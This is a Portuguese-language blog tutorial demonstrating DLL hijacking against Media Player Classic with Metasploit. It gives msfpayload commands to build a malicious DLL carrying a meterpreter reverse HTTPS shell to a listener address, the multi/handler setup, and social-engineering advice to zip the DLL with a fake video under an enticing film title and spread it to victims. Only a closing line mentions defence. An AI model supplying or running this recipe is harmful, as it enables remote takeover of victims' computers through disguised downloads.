DLL Hijacking – Exploração
Apresentamos abaixo uma breve descrição técnica e um vídeo demonstrativo da utilização da técnica DLL Hijacking por meio do Framework Metasploit. Se quiser ler sobre o que é esta técnica, acesse a parte 1 do artigo.
Para executar um ataque de DLL Hijacking, o programa que irá carregar a DLL deve ser previamente definido, de forma que a DLL vulnerável possa ser substituída pela DLL maliciosa. Abaixo segue uma lista de DLL’s vulneráveis e seus respectivos softwares:
http://www.exploit-db.com/dll-hijacking-vulnerable-applications/
Uma vez que a DLL tenha sido modificada, se faz necessário que este arquivo seja substituído pelo arquivo original na máquina vítima ou que ele esteja na mesma pasta que o arquivo a ser executado. A grande vantagem de se ter a DLL maliciosa dentro do diretório de instalação do software alvo é que sempre quando o usuário utilizar o software o mesmo carregará a DLL maliciosa.
SHOW TIME!
A seguir será realizada uma demonstração de como utilizar está técnica, utilizando o famoso meterpreter em uma DLL do programa “Media Player Classic”.
httpv://www.youtube.com/watch?v=mucZ5ArSjSk
O primeiro passo antes de qualquer exploração é atualizar o Metasploit para evitar possíveis erros ou falta de plugins. No BackTrack4, chame a console do Metasploit e execute o comando de atualização:
root@bt: /pentest/exploits/framework3# ./msfconsole
# svn update
#exit
Vamos modificar a DLL original com códigos maliciosos utilizando o aplicativo msfpayload do Metasploit. É importante observar que o nome dado a DLL deve ser o mesmo da DLL utilizada pelo software alvo (Media Player Classic versão 6.4.9.1). O nome da DLL pode variar de acordo com a versão do programa alvo.
O Meterpreter contém várias intruções de códigos maliciosos pré-definidos. No caso, iremos utilizar uma Shell Reverso HTTPS e em seguida, vamos criar um arquivo de vídeo (fake) que servirá como isca para a vítima:
root@bt: /pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_https LHOST=192.168.100.107 LPORT=443 D > /root/iacenc.dll
# touch nome_do_video_desejado.flv
Com um pouco de criatividade e Engenharia Social, pode-se criar um arquivo ZIP de nome atrativo contendo a DLL maliciosa e o arquivo de falso. (Imagine um arquivo com o nome de Tropa de Elite 2 )
Antes de enviar o arquivo para a vítima, é necessário deixar o Metasploit aguardando a conexão reversa:
root@bt: /pentest/exploits/framework3# ./msfconsole
use multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.100.107
set LPORT 443
exploit –j
Agora, pode-se enviar o arquivo para a vítima ou espalhá-lo da forma que achar mais conveniente e aguardar a conexão reversa da vítima…
Sim.. simples assim e assustador…
Explore nosso blog para conhecer mais a fundo outros ataques e como se proteger.
Até a próxima! 🙂